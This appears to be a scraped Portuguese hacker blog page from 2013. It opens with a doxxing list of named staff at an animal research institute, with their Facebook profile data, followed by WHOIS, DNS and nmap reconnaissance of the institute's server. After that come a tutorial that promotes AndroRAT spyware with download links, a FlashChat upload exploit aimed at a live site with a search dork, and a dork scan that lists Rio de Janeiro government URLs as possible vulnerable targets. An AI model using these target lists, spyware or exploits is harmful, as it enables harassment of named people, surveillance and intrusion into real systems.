   "link": "http://www.facebook.com/miriana.machado",
   "username": "miriana.machado",
   "gender": "female",
   "locale": "fr_FR"
}

=================================
COORDENADORES DE ÁREA
=================================
- Garantia de Qualidade: Graziela Mendes Pereira

- Canil Maternidade e Estoque: Adriana Leite de Almeida www.facebook.com/adriana.leite.33
{
   "id": "100002325151016",
   "name": "Drix Almeida",
   "first_name": "Drix",
   "last_name": "Almeida",
   "link": "http://www.facebook.com/adriana.leite.33",
   "username": "adriana.leite.33",
   "gender": "female",
   "locale": "pt_BR"
}

- Laboratório de Análises Clínicas: Andrea Bezerra Cuesta

- Patologia: Carolina de Souza Ruschi www.facebook.com/carolina.ruschi
{
   "id": "100000221498493",
   "name": "Carol Souza",
   "first_name": "Carol",
   "last_name": "Souza",
   "username": "carolina.ruschi",
   "gender": "female",
   "locale": "pt_BR"
}

- Coordenador do Biotério de Coelhos e Roedores: Claudemir Duran Filho www.facebook.com/claudemir.duran

- Canil Experimental: Renato Festraits Xavier www.facebook.com/renato.xavier.50115
{
   "id": "100002784831473",
   "name": "Renato Xavier",
   "first_name": "Renato",
   "last_name": "Xavier",
   "link": "http://www.facebook.com/renato.xavier.50115",
   "username": "renato.xavier.50115",
   "gender": "male",
   "locale": "pt_BR"
}

- Genotox:
Izabel Vianna Villela www.facebook.com/izabel.villela.7
{
   "id": "1831213683",
   "name": "Izabel Villela",
   "first_name": "Izabel",
   "last_name": "Villela",
   "username": "izabel.villela.7",
   "gender": "female",
   "locale": "pt_BR"
}
Jaqueline de Deos da Silveira www.facebook.com/jaqueline.silveira.585
{
   "id": "100000626588797",
   "name": "Jaqueline Silveira",
   "first_name": "Jaqueline",
   "last_name": "Silveira",
   "username": "jaqueline.silveira.585",
   "gender": "female",
   "locale": "pt_BR"
}

=================================
PESQUISADORES
=================================
- Canil Experimental:
Enrico Corassini www.facebook.com/enrico.corassini
{
   "id": "100001577486726",
   "name": "Enrico Corasini",
   "first_name": "Enrico",
   "last_name": "Corasini",
   "username": "enrico.corassini",
   "gender": "male",
   "locale": "pt_BR"
}

- Biotério Coelhos e Roedores
Claudia Karina de Oliveira Alves
Felipe Andrade de Sá www.facebook.com/felipe.andradedesa
{
   "id": "100001342079082",
   "name": "Felipe Andrade de S\u00e1",
   "first_name": "Felipe",
   "last_name": "Andrade de S\u00e1",
   "link": "http://www.facebook.com/felipe.andradedesa",
   "username": "felipe.andradedesa",
   "gender": "male",
   "locale": "pt_BR"
}

Josiane Lopes da Silva Freire
Juliana Martins Maestro www.facebook.com/juliana.maestro.5
{
   "id": "100001230028679",
   "name": "Juliana Maestro",
   "first_name": "Juliana",
   "last_name": "Maestro",
   "link": "http://www.facebook.com/juliana.maestro.5",
   "username": "juliana.maestro.5",
   "gender": "female",
   "locale": "pt_BR"
}

Michele Cristiane de Camargo www.facebook.com/michele.camargo.98
{
   "id": "100003179280844",
   "name": "Michele Camargo",
   "first_name": "Michele",
   "last_name": "Camargo",
   "link": "http://www.facebook.com/michele.camargo.98",
   "username": "michele.camargo.98",
   "gender": "female",
   "locale": "pt_BR"
}

Simone Lira da Cruz www.facebook.com/simonenica
{
   "id": "100001451676279",
   "name": "Simone Lira da Cruz",
   "first_name": "Simone",
   "last_name": "Lira da Cruz",
   "link": "http://www.facebook.com/simonenica",
   "username": "simonenica",
   "gender": "female",
   "locale": "pt_BR"
}

Tayná Neves Cardoso
Rafael Luiz da Silva www.facebook.com/rafaelluiz.silva.58
{
   "id": "1075621297",
   "name": "Rafa Silva",
   "first_name": "Rafa",
   "last_name": "Silva",
   "link": "http://www.facebook.com/rafaelluiz.silva.58",
   "username": "rafaelluiz.silva.58",
   "gender": "male",
   "locale": "pt_BR"
}

- Patologia
Tatiana Elias www.facebook.com/tatianae.vet
{
   "id": "100000354109812",
   "name": "Tatiana Elias",
   "first_name": "Tatiana",
   "last_name": "Elias",
   "link": "http://www.facebook.com/tatianae.vet",
   "username": "tatianae.vet",
   "gender": "female",
   "locale": "pt_BR"
}

- Laboratório de Análises Clínicas
Felipe Victor Cerqueira www.facebook.com/felipevictorc

=================================

https://twitter.com/@InstitutoRoyal
https://institutoroyal.org.br/

domínio:       institutoroyal.org.br
titular:       Inst. de Ed. p/ Pesq. e Desenv. Inov. tec. Royal
documento:     007.196.513/0001-69
responsável:   Silvia Ortiz

Contato (ID):  CRDOM5
nome:          cristalia dominios
e-mail:        [email protected]
criado:        28/09/2009
alterado:      16/02/2011


CÓDIGO E DESCRIÇÃO DA NATUREZA JURÍDICA
399-9 - ASSOCIACAO PRIVADA

LOGRADOURO
ROD RAPOSO TAVARES
NÚMERO S/N
COMPLEMENTO KM 56

CEP  18.131-220
BAIRRO/DISTRITO  MAILASQUI
MUNICÍPIO  SAO ROQUE
UF SP





bool(false)
array(26) {
  ["url"]=>
  string(28) "HTTP://institutoroyal.org.br"
  ["content_type"]=>
  string(9) "text/html"
  ["http_code"]=>
  int(200)
  ["header_size"]=>
  int(277)
  ["request_size"]=>
  int(171)
  ["filetime"]=>
  int(-1)
  ["ssl_verify_result"]=>
  int(0)
  ["redirect_count"]=>
  int(0)
  ["total_time"]=>
  float(2.901)
  ["namelookup_time"]=>
  float(0)
  ["connect_time"]=>
  float(2.511)
  ["pretransfer_time"]=>
  float(2.511)
  ["size_upload"]=>
  float(0)
  ["size_download"]=>
  float(331)
  ["speed_download"]=>
  float(114)
  ["speed_upload"]=>
  float(0)
  ["download_content_length"]=>
  float(331)
  ["upload_content_length"]=>
  float(0)
  ["starttransfer_time"]=>
  float(2.901)
  ["redirect_time"]=>
  float(0)
  ["certinfo"]=>
  array(0) {
  }
  ["primary_ip"]=>
  string(12) "74.55.84.131"
  ["primary_port"]=>
  int(80)
  ["local_ip"]=>
  string(13) "192.168.1.100"
  ["local_port"]=>
  int(2861)
  ["redirect_url"]=>
  string(0) ""
}
NSLOOKUP MX:

Servidor:  google-public-dns-a.google.com
Address:  8.8.8.8

institutoroyal.org.br MX preference = 10, mail exchanger = mail.institutoroyal.org.br
MX Sem informações
NSLOOKUP TXT:

Servidor:  google-public-dns-a.google.com
Address:  8.8.8.8

institutoroyal.org.br text =

"v=spf1 ip4:74.55.84.131 ~all"
TXT Sem informações
NSLOOKUP NS:

Servidor:  google-public-dns-a.google.com
Address:  8.8.8.8

institutoroyal.org.br nameserver = ns12.srv22.netme.com.br
institutoroyal.org.br nameserver = ns11.srv22.netme.com.br
NS Sem informações
NSLOOKUP CNAME:

Servidor:  google-public-dns-a.google.com
Address:  8.8.8.8

institutoroyal.org.br
primary name server = ns11.srv22.netme.com.br
responsible mail addr = hudson\.borges.institutoroyal.org.br
serial  = 1343673080
refresh = 10800 (3 hours)
retry   = 3600 (1 hour)
expire  = 604800 (7 days)
default TTL = 10800 (3 hours)
CNAME Sem informações
RESPOSTA PING:


Disparando institutoroyal.org.br [74.55.84.131] com 32 bytes de dados:
Resposta de 74.55.84.131: bytes=32 tempo=207ms TTL=114
Resposta de 74.55.84.131: bytes=32 tempo=205ms TTL=114
Resposta de 74.55.84.131: bytes=32 tempo=208ms TTL=114
Resposta de 74.55.84.131: bytes=32 tempo=206ms TTL=114

Estat¡sticas do Ping para 74.55.84.131:
    Pacotes: Enviados = 4, Recebidos = 4, Perdidos = 0 (0% de
             perda),
Aproximar um n£mero redondo de vezes em milissegundos:
    M¡nimo = 205ms, M ximo = 208ms, M‚dia = 206ms


Scanning institutoroyal.org.br (74.55.84.131) [4 ports]
Completed Ping Scan at 19:47, 0.60s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:47
Completed Parallel DNS resolution of 1 host. at 19:47, 0.20s elapsed
Initiating SYN Stealth Scan at 19:47
Scanning institutoroyal.org.br (74.55.84.131) [1000 ports]
Discovered open port 21/tcp on 74.55.84.131
Discovered open port 3389/tcp on 74.55.84.131
Discovered open port 443/tcp on 74.55.84.131
Discovered open port 110/tcp on 74.55.84.131
Discovered open port 143/tcp on 74.55.84.131
Discovered open port 53/tcp on 74.55.84.131
Discovered open port 995/tcp on 74.55.84.131
Discovered open port 22/tcp on 74.55.84.131
Discovered open port 80/tcp on 74.55.84.131
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
SYN Stealth Scan Timing: About 8.07% done; ETC: 19:53 (0:05:53 remaining)
adjust_timeouts2: packet supposedly had rtt of 8274699 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8274699 microseconds.  Ignoring time.
Increasing send delay for 74.55.84.131 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of 10642984 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 10642984 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9719458 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9719458 microseconds.  Ignoring time.
SYN Stealth Scan Timing: About 17.93% done; ETC: 19:52 (0:04:39 remaining)
Discovered open port 8443/tcp on 74.55.84.131
SYN Stealth Scan Timing: About 57.00% done; ETC: 19:49 (0:01:09 remaining)
Discovered open port 465/tcp on 74.55.84.131
Completed SYN Stealth Scan at 19:48, 103.47s elapsed (1000 total ports)
Initiating Service scan at 19:48
Scanning 11 services on institutoroyal.org.br (74.55.84.131)
Completed Service scan at 19:50, 65.00s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against institutoroyal.org.br (74.55.84.131)
Retrying OS detection (try #2) against institutoroyal.org.br (74.55.84.131)
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for institutoroyal.org.br (74.55.84.131)
Host is up (0.20s latency).
rDNS record for 74.55.84.131: srv22.netme.com.br
Scanned at 2013-10-20 19:47:12 BRST for 175s
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
22/tcp   open  ssh           OpenSSH 5.9 (protocol 2.0)
53/tcp   open  domain        ISC BIND hostmaster
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
110/tcp  open  pop3          MailEnable POP3 Server
143/tcp  open  imap          MailEnable imapd
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
465/tcp  open  ssl/smtp
995/tcp  open  ssl/pop3      MailEnable POP3 Server
3389/tcp open  microsoft-rdp Microsoft Terminal Service
8443/tcp open  ssl/http      Microsoft IIS httpd 7.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-

submit.cgi :
SF-Port465-TCP:V=5.51%T=SSL%I=7%D=10/20%Time=52644FF4%P=x86_64-redhat-linu
SF:x-gnu%r(NULL,12,"220\x20SMTP\x20Service\r\n")%r(Hello,AA,"220\x20SMTP\x
SF:20Service\r\n250-srv22\.netme\.com\.br\x20\[187\.57\.152\.251\],\x20thi
SF:s\x20server\x20offers\x205\x20extensions\r\n250-AUTH\x20LOGIN\r\n250-SI
SF:ZE\x2051200000\r\n250-HELP\r\n250-AUTH=LOGIN\r\n250\x20XSAVETOSENT\r\n"
SF:)%r(Help,5F,"220\x20SMTP\x20Service\r\n211\x20Help:->Supported\x20Comma
SF:nds:\x20HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n")%r(GenericLin
SF:es,4E,"220\x20SMTP\x20Service\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (89%)
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 (88%), Microsoft Windows Server 2008 SP2 (88%), Microsoft Windows 7 (88%),

Microsoft Windows 7 Professional (88%), Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7 (88%), Microsoft Windows Server 2008 Beta 3 (86%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=5.51%D=10/20%OT=21%CT=%CU=%PV=N%G=N%TM=5264500F%P=x86_64-redhat-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10F%TS=7)
OPS(O1=M5A0ST11%O2=M5A0ST11%O3=M5A0NNT11%O4=M5A0ST11%O5=M5A0ST11%O6=M5A0ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M5A0NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=N)

Uptime guess: 1.806 days (since Fri Oct 18 23:28:48 2013)
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.96 seconds
           Raw packets sent: 3108 (141.060KB) | Rcvd: 76 (3.780KB)

Tutorial unknownsec - DESENVOLVENDO MALWARE PARA ANDROID (UPDATE)

DESENVOLVENDO MALWARE PARA ANDROID (UPDATE)
Aéeeeeee galera vai um tuto de um dos melhores blogs sobre sec que leio, o http://unknownsec.wordpress.com.
Espero que gostem.



Em busca de novos conhecimentos sobre AndroidHack eu descobri um projeto de um malware para Android.

O projeto chamado AndroRAT (RAT vem de Remote Administration Tool) desenvolvido por um francês chamado Robin David, o interessante desse projeto é que ele o deixou disponível na internet o código fonte do projeto, assim possibilitando o estudo de todo o malware e dando a iniciativa da criação de novos malware.

Algumas das funcionalidades do AndroRAT

* Pegar informações de Contatos

* Pegar logs de ligações

* Pegar todas as menssagens

* Localização por GPS/REDE

* Monitoração de mensagens enviadas e recebidas ao vivo

* Monitoração de  ligações ao vivo (Ligações feitas, recebidas, perdidas)

* Tirar foto da camera

* Stream de som do microfone (ou ligações em tempo real)

* Streaming de vídeo

* Mandar mensagem na tela do celular

* Realizar ligações

Bom agora vou mostrar nesse artigo como usar o AndroRAT e como abrir o código fonte dele, que eu particularmente apanhei um pouco rsrsrs.

Primeiro, precisamos preparar nosso computador para isso, faça o download do SDK para android.

http://developer.android.com/sdk/index.html

Assim que terminar, faça a instalação do SDK, abra o eclipse que vem na instalação.

Agora, faça o download do código fonte do Androrat.

https://github.com/RobinDavid/androrat/archive/master.zip

Descompacte o arquivo em uma pasta. Agora, no eclipse, clique em File, New, “projeto”, agora em “android” pasta, selecione a importação de arquivo existente, clique em Avançar, procure a pasta AndroRat (androrat-master\src\AndroRat\ no meu caso claro =D)

Importe ela para o eclipse e seja feliz em modificar seu app.

Eu não vou mostrar como modificar nem como gerar, isso vai do interesse de cada um em aprender.

FAZENDO TESTE VOCÊ MESMO!
Vou disponibilizar já compilado o servidor (desktop) e o client (android)

AndroRat.jar (2.6 MB)

https://mega.co.nz/#!g5tUxbRC!ax5LajVZz1kbyJKg2–3fzu0Z_VkE_BiMEZGb4i8vrg

Androrat.apk (66 KB)

https://mega.co.nz/#!cpFznTCQ!Sd8hthyEwAFdSjN0l7v0ew3frEEUWjhwYfXr19N0zF8
No Client ele pedirá para você colocar o IP e a Porta do Server que aceitará as conexões.


De resto, é só alegria, basta ver o vídeo abaixo para ter uma “noção” de como ele funciona.




(UPDATE) Depois de uma briga com o Megaupload, eu upei os arquivos no 4shared, segue os links.

(UPDATE) After a fight with Megaupload, I upei files at 4shared follows links.

AndroRAT.jar

AndroidClient.apk


Fonte:http://unknownsec.wordpress.com/2013/06/11/desenvolvendo-malware-para-android/

quinta-feira, 17 de outubro de 2013

Joomscan

Joomscan permite Testar o seu site sobre os tipos de ataques XSS, SQL Injection, LFI, RFI, bruteforce

Joomscan permite Testar o seu site sobre os tipos de ataques XSS, SQL Injection, LFI, RFI, bruteforce etc.
Joomla é um sistema de gerenciamento de conteúdo open source (CMS). É uma estrutura muito poderosa para a construção de web sites e é um dos mais populares sistemas mais poderosos e para gerenciamento de conteúdo em todo o mundo.

http://web-center.si/projekt-joomscan/155-orodje-za-testiranje-joomle-joomscan

segunda-feira, 14 de outubro de 2013

Exploit: FlashChat File Upload.

Exploitando FlashChat 

Exploit: FlashChat File Upload.
Software Link0x3A3A3A3A http://www.tufat.com/script2.htm
Vs0x3A3A3A3A v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7

Modo de uso0x3A3A3A3A
Defina url alvo http://alvo//pasta/chat/ ou http://alvo/chat/
Usando:  
http://localhost/exploit.php?url=http://www.thenorfolkbroads.org/forum/chat/ 

REF:http://www.exploit-db.com/exploits/28709/

Exploitando FlashChat

Exploit
Exploit

DORK[0]0x3A3A3A3A intitle:"FlashChat v6.0.8" ext:php

By0x3A3A3A3A GoogleINURL

Scirpt: http://pastebin.com/GgF9Sr8L

domingo, 13 de outubro de 2013

Dork busca de erros no domino rj.gov.br

Scanner INURL na pratica.

Dork busca de erros no domino rj.gov.br

TOTAL DE URL's: 162
EXPLOIT USADO:
DORK: site:rj.gov.br "Warning:" ext:php

TOTAL DE POSSÍVEIS VULL: 145

Resultado:

[1] - http://www.saogoncalo.rj.gov.br/habita/consultarNoticia.php?data=015231&mes=&ano=0151
/ HTTP_CODE: 200  / IP SERVER: 186.215.208.119  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
[2] - www.saogoncalo.rj.gov.br/habita/consultarNoticia.php?data=015231...
/ HTTP_CODE: 200  / IP SERVER: 186.215.208.119  / PORTA SERVER: 80  / WEB SERVER:
[3] - http://pmnf.rj.gov.br/receita_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[4] - http://www.pmnf.rj.gov.br/d_logos.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[5] - www.pmnf.rj.gov.br/d_logos.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[6] - http://www.pmnf.rj.gov.br/turismo_mapas.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[7] - www.pmnf.rj.gov.br/turismo_mapas.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[8] - http://www.pmnf.rj.gov.br/localiza_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[9] - www.pmnf.rj.gov.br/localiza_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[10] - http://www.2gmar.rj.gov.br/index.php?option=com_content&view=category&id=37%3Ahistorico&Itemid=27
/ HTTP_CODE: 200  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[11] - www.2gmar.rj.gov.br/index.php?option=com...view...
/ HTTP_CODE: 404  / IP SERVER: 201.18.168.67  / PORTA SERVER: 80  / WEB SERVER:
[12] - http://www.voltaredonda.rj.gov.br/cidade/eventos.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[13] - www.voltaredonda.rj.gov.br/cidade/eventos.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[14] - http://www.pmnf.rj.gov.br/turismo_conheca.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[15] - www.pmnf.rj.gov.br/turismo_conheca.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[16] - http://novafriburgo.rj.gov.br/orgaospub_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[17] - http://www.voltaredonda.rj.gov.br/servicos/gripe_suina.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[18] - www.voltaredonda.rj.gov.br/servicos/gripe_suina.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[19] - http://pmnf.rj.gov.br/brasaobandeira_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[20] - http://www.voltaredonda.rj.gov.br/servicos/mail/senha.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[21] - www.voltaredonda.rj.gov.br/servicos/mail/senha.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[22] - http://www.pmnf.rj.gov.br/hospitais_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[23] - www.pmnf.rj.gov.br/hospitais_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[24] - http://vr.rj.gov.br/servicos/mail/index.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.35  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[25] - http://www.pmnf.rj.gov.br/dados_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[26] - www.pmnf.rj.gov.br/dados_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[27] - http://pmnf.rj.gov.br/cartorios_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[28] - http://www.pmnf.rj.gov.br/telefonesuteis_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[29] - www.pmnf.rj.gov.br/telefonesuteis_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[30] - http://www.pmnf.rj.gov.br/autarquias_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.10 mod_perl/2.0.5 Perl/v5.8.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[31] - www.pmnf.rj.gov.br/autarquias_n.php
/ HTTP_CODE: 200  / IP SERVER: 189.1.48.22  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[32] - http://www.servidor.campos.rj.gov.br/index.php?option=com_atomicongallery&folder=&Itemid=41
/ HTTP_CODE: 200  / IP SERVER: 177.131.189.4  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.19 (Unix) DAV/2 PHP/5.3.8
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[33] - www.servidor.campos.rj.gov.br/index.php?option=com...
/ HTTP_CODE: 404  / IP SERVER: 177.131.189.4  / PORTA SERVER: 80  / WEB SERVER:
[34] - http://www.voltaredonda.rj.gov.br/destaque/dengue/index.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[35] - www.voltaredonda.rj.gov.br/destaque/dengue/index.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[36] - http://www.voltaredonda.rj.gov.br/destaque/ponto_estagiarios2.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER: Server: Apache/2.2.3 (Red Hat)
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[37] - www.voltaredonda.rj.gov.br/destaque/ponto_estagiarios2.php
/ HTTP_CODE: 200  / IP SERVER: 177.71.67.33  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: ERROPHP-01 - ERRO: Warning: include
[38] - http://www.itaocara.rj.gov.br/index-imprimir.php?pg=noticia-imprimir&id=
/ HTTP_CODE: 200  / IP SERVER: 69.64.52.47  / PORTA SERVER: 80  / WEB SERVER: Date: Sun, 13 Oct 2013 23:28:19 GMT
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[39] - www.itaocara.rj.gov.br/index-imprimir.php?pg=noticia...
/ HTTP_CODE: 200  / IP SERVER: 69.64.52.47  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: INDEFINIDO-03 - ERRO: Warning
[40] - http://www.cetepmacae.rj.gov.br/site/barra_direita.php
/ HTTP_CODE: 200  / IP SERVER: 177.85.96.139  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: MYSQL-01 - ERRO: mysql_
[41] - www.cetepmacae.rj.gov.br/site/barra_direita.php
/ HTTP_CODE: 200  / IP SERVER: 177.85.96.139  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: MYSQL-01 - ERRO: mysql_
[42] - http://www.cetepmacae.rj.gov.br/site/galeria_noticia.php
/ HTTP_CODE: 200  / IP SERVER: 177.85.96.139  / PORTA SERVER: 80  / WEB SERVER: Server: Apache
Tipo de erro: MYSQL-01 - ERRO: mysql_
[43] - www.cetepmacae.rj.gov.br/site/galeria_noticia.php
/ HTTP_CODE: 200  / IP SERVER: 177.85.96.139  / PORTA SERVER: 80  / WEB SERVER:
Tipo de erro: MYSQL-01 - ERRO: mysql_
[44] - http://www.viiisenabom.rj.gov.br/defencil/eng/index_eng.php
